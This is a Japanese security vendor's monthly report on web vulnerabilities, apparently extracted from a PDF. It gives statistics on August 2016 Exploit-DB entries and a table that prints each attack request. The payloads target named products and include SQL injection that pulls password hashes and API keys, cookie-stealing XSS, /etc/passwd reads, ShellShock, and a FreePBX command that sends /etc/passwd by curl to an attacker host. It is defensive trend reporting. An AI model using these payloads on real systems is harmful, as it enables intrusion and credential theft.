2016 - penta security systems inc. · wso2 carbon 7 nagios network analyzer 5 wordpress 5 sakai 4...

2016.08

1. 脆弱性別件数脆弱性カテゴリ 件数

ファイルアップロード

(File Upload)1

リモートコマンド実行

(Remote Command Execution)2

ディレクトリトラバーサル

(Directory Traversal)2

ローカルファイル挿入

(Local File Inclusion:LFI)4

コマンド インジェクション

(Command Injection)5

SQL インジェクション

(SQL Injection)10

クロスサイトスクリプティング

(Cross Site Scripting : XSS)12

合計 36

2. 危険度別件数危険度 件数 割合

早急対応要 3 8%

高 33 92%

合計 36 100%

3. 攻撃実行の難易度別件数難易度 件数 割合

難 3 6%

中 12 24%

易 32 65%

合計 49 100%

4. 主なソフトウェア別脆弱性発生件数ソフトウェア名 件数

WSO2 Carbon 7

Nagios Network Analyzer 5

Wordpress 5

Sakai 4

Nagios Incident Manager 2

NUUO NVRmini 2

FreePBX 2

Navis WebAccess 1

Nagios Log Server 1

PHP Power Browse 1

chatNow 1

phpCollab CMS 1

Davolink 1

Subrion CMS 1

Zabbix 1

WebNMS Framework Server 1

合計 36

EDB-Report最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

サマリー

2016年8月に公開されたExploit-DBの分析結果、Cross Site Scriptingの攻撃に対する脆弱性報告件数が最も多かったです。発見されたCross Site Scriptingらの攻撃は単にスクリプトを使用したり、イメージタグを使用す

るなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした 。しかし、Cross Site Scriptingの攻撃は、スクリプトおよび特定タグが実行されると、脆弱な部分に実際の多様なコードが挿入ができる攻撃

なので、スクリプトおよびタグなどの実行自体ができないようにしなければなりません。したがって、脆弱性が発見された該当ソフトウェアを使用する管理者はそのスクリプトおよびイメージタグが実行されるかを確認した後、必ずセキュアコー

ディングおよびアップデートが必要と考えられます。Cross Site Scripting以外の脆弱性では、Linux Bashの脆弱性としてよく知られているShellShockの脆弱性が発見されました。攻撃パターンは、主にHTTP Headerに入り、

CGIが実行される際、任意の命令語が実行されることができます。2014年に初めて発見されたShellShockの脆弱性は、OpenSSLの脆弱性であるHeartBleed脆弱性よりもっと波及力が大きな脆弱性でしたが、現在はBash

Updateを最新に実施して、解決することができます。古いバージョンのLinuxを使用している管理者であればこのようなセキュリティアップデートを実施し、ShellShockと同じ脆弱性に露出されて、規模の大きいセキュリティ事故とつなが

らないように注意しなければなりません。

ペンタセキュリティシステムズ株式会社R&Dセンター　データセキュリティチーム

1

2 2

4

5

10

12

0

2

4

6

8

10

12

14

File Upload RemoteCommandExecution

DirectoryTraversal

LFI CommandInjection

SQL Injection XSS

脆弱性別件数

3

33

危険度別件数

早急対応要

高

3

12

32

攻撃実行の難易度別件数

難

中

易

7

5

54

2

2

2

1

1

1

11

11 1

主なソフトウェア別脆弱性発生件数

WSO2 Carbon

Nagios Network Analyzer

Wordpress

Sakai

Nagios Incident Manager

NUUO NVRmini

FreePBX

Navis WebAccess

Nagios Log Server

PHP Power Browse

chatNow

phpCollab CMS

Davolink

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

2016-08-01 40190 XSS 中 高WordPress WP Live Chat

Support Plugin 6.2.03 - admin-ajax.php XSS 脆弱性

POST /wp-admin/admin-ajax.php HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105,110, 32, 110, 97, 109, 101, 33, 34, 41,59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83,32, 105, 110, 32, 109, 115, 103, 33, 34, 41,59));</script>

WordpressWordPress WP

Live Chat SupportPlugin 6.2.03

2016-08-01 40189 SQL Injection 難 早急対応要WordPress Booking Calendar

Plugin 6.2 - SQL Injection

POST /wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking&wh_approved&wh_is_new=1&wh_booking_date=3&view_mode=vm_listing HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

wh_booking_id=3 AND (SELECT 5283 FROM(SELECTCOUNT(*),CONCAT(0x7176626271,(SELECTMID((IFNULL(CAST(user_pass AS CHAR),0x20)),1,54)FROM wordpress.wp_users ORDER BY ID LIMIT0,1),0x717a787a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.CHARACTER_SETS GROUP BYx)a)

WordpressWordPress

Booking CalendarPlugin 6.2

2016-08-05 40206 XSS 中 高WordPress Count per Day Plugin

3.5.4 - / XSS 脆弱性

GET / HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X10_11_5) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/51.0.2704.103 Safari/537.36Referer:javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))

WordpressWordPress Count

per Day Plugin3.5.4

2016-08-05 40205 XSS 易 高 Davolink DV-2051 - / XSS 脆弱性/scvrtsrv.cmd?action=add&srvName=FooBar<iframe%20onload=alert(0)>&srvAddr=192.168.1.100&proto=1,&eStart=4444,&eEnd=4444,iStart=4444,&iEnd=4444,

DavolinkDavolink DV-

2051

2016-08-05 40204 LFI 易 高PHP Power Browse 1.2 -browse.php LFI 脆弱性

/browse.php?p=source&file=/etc/passwd PHP PowerBrowse

PHP PowerBrowse 1.2

2016-08-05 40202 SQL Injection 易 高Subrion CMS 4.0.5 -

/admin/database/sql/ SQLInjection 脆弱性

POST /admin/database/sql/ HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

query=1 and 1=1--&show_query=1 or 1=1--&exec_query=Go

Subrion CMSSubrion CMS

4.0.5

EDB-Report最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

Copyright 2016 Penta Security Systems Inc. All rights reserved

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

EDB-Report最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-08-06 40213Remote Command

Execution難 早急対応要

NUUO NVRmini 2 3.0.8 - /cgi-

bin/cgi_system RCE 脆弱性

POST / HTTP/1.1

Host:

User-Agent: () { :;}; /bin/ls -al

Accept: */*

Content-Type: application/x-www-form-urlencoded;

charset=UTF-8

cmd=ftp_setup&act=modify&com_port=21&pasv_port_fr

om=1024&pasv_port_to=65535&services=enable

NUUO NVRminiNUUO NVRmini 2

3.0.8

2016-08-06 40212 Command Injection 易 高NUUO NVRmini 2 3.0.8 - /cgi-

bin/cgi_system CommandInjection 脆弱性

POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no

NUUO NVRminiNUUO NVRmini 2

3.0.8

2016-08-08 40218 SQL Injection 易 高phpCollab CMS 2.5 -

emailusers.php SQL Injection 脆弱性

/phpcollab/users/emailusers.php?id=1%20or%201=1--&&PHPSESSID=ghtu76jt276nji04lua07930t5

phpCollab CMSphpCollab CMS

2.5

2016-08-08 40216 SQL Injection 易 高Navis WebAccess -

showNotice.do SQL Injection 脆弱性

/express/showNotice.do?report_type=1&GKEY=2 AND9753=(SELECTUPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASEWHEN (9753=9753) THEN 1 ELSE 0 END) FROMDUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)

Navis WebAccess Navis WebAcces

2016-08-10 40229 Directory Traversal 易 高WebNMS Framework Server 5.2and 5.2 SP1 - /servlets/ Directory

Traversal 脆弱性

POST/servlets/FileUploadServlet?fileName=../jsp/Login.jspHTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

WebNMSFramework

Server

WebNMSFramework

Server 5.2 and5.2 SP1

2016-08-15 40237 SQL Injection 易 高Zabbix 2.2.x, 3.0.x - latest.php

SQL Injection 脆弱性

/latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385)%3B%20select%20*%20from%20users%20where%20(1%3D1

ZabbixZabbix 2.2.x,

3.0.x

2016-08-16 40241 XSS 易 高WSO2 Carbon 4.4.5 -

challenges-mgt.jsp XSS 脆弱性

/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS&setName="/><script>alert(document.cookie)</script>

WSO2 CarbonWSO2 Carbon

4.4.5

Copyright 2016 Penta Security Systems Inc. All rights reserved

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

EDB-Report最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-08-16 40240 LFI 易 高WSO2 Carbon 4.4.5 -

downloadgz-ajaxprocessor.jspLFI 脆弱性

/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml&tenantDomain=&serviceName=

WSO2 CarbonWSO2 Carbon

4.4.5

2016-08-16 40252 Command Injection 中 高

Nagios Incident Manager 2.0.0 -

/nagiosim/reports/download/

Command Injection 脆弱性

/nagiosim/reports/download/jpg/mttr/c3RhcnRfZGF0ZT0

yMDE2LTA1LTA2JmVuZF9kYXRlPTIwMTYtMDUtMDYmdHl

wZXNbXT0yIiIiO3t0b3VjaCwvdG1wL01ZRklMRX07ZWNob

w==

Nagios Incident

Manager

Nagios Incident

Manager 2.0.0

2016-08-16 40251 SQL Injection 中 高Nagios Network Analyzer 2.2.0 -/nagiosna/index.php/api/checks

/ SQL Injection 脆弱性

/nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0&o%5Bcol%5D=name%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))UtTW)&o%5Bsort%5D=ASC

Nagios NetworkAnalyzer

Nagios NetworkAnalyzer 2.2.0

2016-08-16 40250 Command Injection 中 高Nagios Log Server 1.4.1 -

Multiple Vulnerabilities

POST /nagioslogserver/api/check/create/1 HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64

AppleWebKit/535.7 KHTML, like Gecko

Chrome/16.0.912.75 Safari/535.7

Accept: */*

Content-Type: application/x-www-form-urlencoded;

charset=UTF-8

alert={"name"%3a"StduserAlertTest","check_interval"%3a"

1m","lookback_period"%3a"1m","warning"%3a"1","critical"

%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/to

uch",

"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created

_by"%3a"stduser","query_id"%3a"AVTLGmd-

GYGKrkWMo5Tc"}

Nagios Log

Server

Nagios Log

Server 1.4.1

2016-08-16 40252 SQL Injection 難 早急対応要Nagios Incident Manager 2.0.0 -/nagiosim/admin/settings SQL

Injection 脆弱性

POST /nagiosim/admin/settings HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

timezone=Pacific/Samoa' AND (SELECT 5323FROM(SELECTCOUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() ASCHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a) AND '

Nagios IncidentManager

Nagios IncidentManager 2.0.0

2016-08-16 40251 SQL Injection 中 高Nagios Network Analyzer 2.2.0 -/nagiosna/index.php/api/source

s/ SQL Injection 脆弱性 #

/nagiosna/index.php/api/sources/read?o%5Bcol%5D=name%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))UtTW)&o%5Bsort%5D=ASC

Nagios NetworkAnalyzer

Nagios NetworkAnalyzer 2.2.0

Copyright 2016 Penta Security Systems Inc. All rights reserved

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

EDB-Report最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-08-16 40251 SQL Injection 中 高Nagios Network Analyzer 2.2.0 -

/nagiosna/index.php/admin/SQL Injection 脆弱性 #

POST /nagiosna/index.php/admin/globals HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

timezone=US/Eastern%' AND (SELECT 4646FROM(SELECT COUNT(*),CONCAT(0x232323,(SELECTMID((IFNULL(CAST(apikey AS CHAR),0x20)),1,54) FROMnagiosna_users WHERE id=1 LIMIT0,1),0x232323,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.CHARACTER_SETS GROUP BYx)a) AND '%'=''

Nagios NetworkAnalyzer

Nagios NetworkAnalyzer 2.2.0

2016-08-16 40251 Command Injection 中 高

Nagios Network Analyzer 2.2.0 -

/nagiosna/index.php/download/r

eport/sourcegroup/ Command

Injection 脆弱性

/nagiosna/index.php/download/report/sourcegroup/test/

cVtyaWRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1R

FU1RGSUxFfTtlY2hvICI=

Nagios Network

Analyzer

Nagios Network

Analyzer 2.2.0

2016-08-16 40251 Command Injection 中 高

Nagios Network Analyzer 2.2.0 -

/nagiosna/index.php/download/r

eport/source/ Command

Injection 脆弱性

/nagiosna/index.php/download/report/source/test/cVtya

WRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1RFU1R

GSUxFfTtlY2hvICI=

Nagios Network

Analyzer

Nagios Network

Analyzer 2.2.0

2016-08-16 40241 XSS 易 高WSO2 Carbon 4.4.5 -

challenges-mgt-finish.jsp XSS 脆弱性 #

/carbon/identity-mgt/challenges-mgt-finish.jsp?setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question0=&question1=City+where+you+were+born+%3F&setId1=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question1=City+where+you+were+born+%3F&question2=Father%27s+middle+name+%3F&setId2=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question2=Father%27s+middle+name+%3F&question3=Name+of+your+first+pet+%3F&setId3=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question3=Name+of+your+first+pet+%3F&question4=Favorite+sport+%3F&setId4=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question4=Favorite+sport+%3F&question5=Favorite+food+%3F&setId5=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question5=Favorite+food+%3F&question6=Favorite+vacation+location+%3F&setId6=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question6=Favorite+vacation+location+%3F&question7=Model+of+your+first+car+%3F&setId7=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question7=Model+of+your+first+car+%3F&question8=Name+of+the+hospital+where+you+were+born+%3F&setId8=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question8=Name+of+the+hospital+where+you+were+born+%3F&setId9=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question9=XSS

WSO2 CarbonWSO2 Carbon

4.4.5

2016-08-16 40241 XSS 易 高WSO2 Carbon 4.4.5 -

webapp_info.jsp XSS 脆弱性

/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war&webappState=all&hostName=victim-server&httpPort=9763&defaultHostName=victim-server&webappType=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\\n\\n%27%20%2bdocument.cookie%29%3C/script%3E

WSO2 CarbonWSO2 Carbon

4.4.5

2016-08-16 40241 XSS 易 高WSO2 Carbon 4.4.5 -

newdatasource.jsp XSS 脆弱性

/carbon/ndatasource/newdatasource.jsp?dsName=%22o

nMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%

20\\n\\n%27%2bdocument.cookie%29&edit=HELLWSO2 Carbon

WSO2 Carbon

4.4.5

Copyright 2016 Penta Security Systems Inc. All rights reserved

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

EDB-Report最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-08-16 40241 XSS 易 高WSO2 Carbon 4.4.5 -validateconnection-

ajaxprocessor.jsp 脆弱性

/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?&dsName=WSO2_CARBON_DB&driver=com.mysql.jdbc.Driver&url=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E&username=root&dsType=RDBMS&customDsType=RDBMS&dsProviderType=default&dsclassname=undefined&dsclassname=undefined&dsproviderProperties=undefined&editMode=false&changePassword=true&newPassword=

WSO2 CarbonWSO2 Carbon

4.4.5

2016-08-16 40241 XSS 易 高WSO2 Carbon 4.4.5 -

handlers.jsp XSS 脆弱性

/carbon/viewflows/handlers.jsp?retainlastbc=true&flow=in&phase=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

WSO2 CarbonWSO2 Carbon

4.4.5

2016-08-22 40288 Directory Traversal 易 高

WordPress 4.5.3 - admin-

ajax.php Directory Traversal 脆弱

性

POST /wp-admin/admin-ajax.php HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64

AppleWebKit/535.7 KHTML, like Gecko

Chrome/16.0.912.75 Safari/535.7

Accept: */*

Content-Type: application/x-www-form-urlencoded;

charset=UTF-8

plugin=../../../../../../../../../../dev/random&action=update-

plugin

Wordpress WordPress 4.5.3

2016-08-22 40286 File Upload 中 高 Sakai 10.7 - / File Upload 脆弱性

POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1Host:Connection: CloseAccept: text/html,application/xhtml+xml, */*Accept-Language: ko-KRUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0;Windows NT 6.2; WOW64; Trident/6.0)Content-Type: multipart/form-data; boundary=---------------------------7dd10029908f2

-----------------------------7dd10029908f2Content-Disposition: form-data; name="file";filename="test.jsp'-alert(1)-'foo"Content-Type: application/octet-stream

test-----------------------------7dd10029908f2--

Sakai Sakai 10.7

2016-08-22 40286 XSS 易 高

Sakai 10.7 -

/portal/tool/~admin-1010/ XSS

脆弱性

/portal/tool/~admin-

1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A

_id10=Data+Warehouse+Update&_id2:_id14=Post&com.

sun.faces.VIEW=&_id2=_id2

Sakai Sakai 10.7

2016-08-22 40286 XSS 易 高Sakai 10.7 -

/access/basiclti/site/~admin/ XSS脆弱性

/access/basiclti/site/~admin/axxm4j<img src=aonerror=alert(3)>

Sakai Sakai 10.7

Copyright 2016 Penta Security Systems Inc. All rights reserved

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

EDB-Report最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-08-22 40286 LFI 易 高Sakai 10.7 - /portal/tool/ LFI 脆

弱性

/portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml

Sakai Sakai 10.7

2016-08-23 40293 XSS 易 高 chatNow - login.php XSS 脆弱性

POST/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1 HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

chatNow chatNow

2016-08-23 40290 LFI 易 高WordPress Mail Masta Plugin

1.0 - count_of_send.php LFI 脆弱性

/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

WordpressWordPress MailMasta Plugin 1.

2016-08-29 40296Remote Command

Execution中 高

FreePBX 13.0.35 - config.phpRCE 脆弱性

/admin/config.php?display=modules&action=upload&download=0x4148&remotemod=http://127.0.0.1/junk%26x=$(cat /etc/passwd);curl -d "$x"http://Attacker_server:8080/0x4148.jnk

FreePBX FreePBX 13.0.35

2016-08-29 40312 SQL Injection 中 高FreePBX 13.0.35 - config.php

SQL Injection 脆弱性/admin/config.php?display=f4ris"XOR(if(6661=6661,sleep(0.03),0))OR"*/

FreePBX FreePBX 13.0.35

Copyright 2016 Penta Security Systems Inc. All rights reserved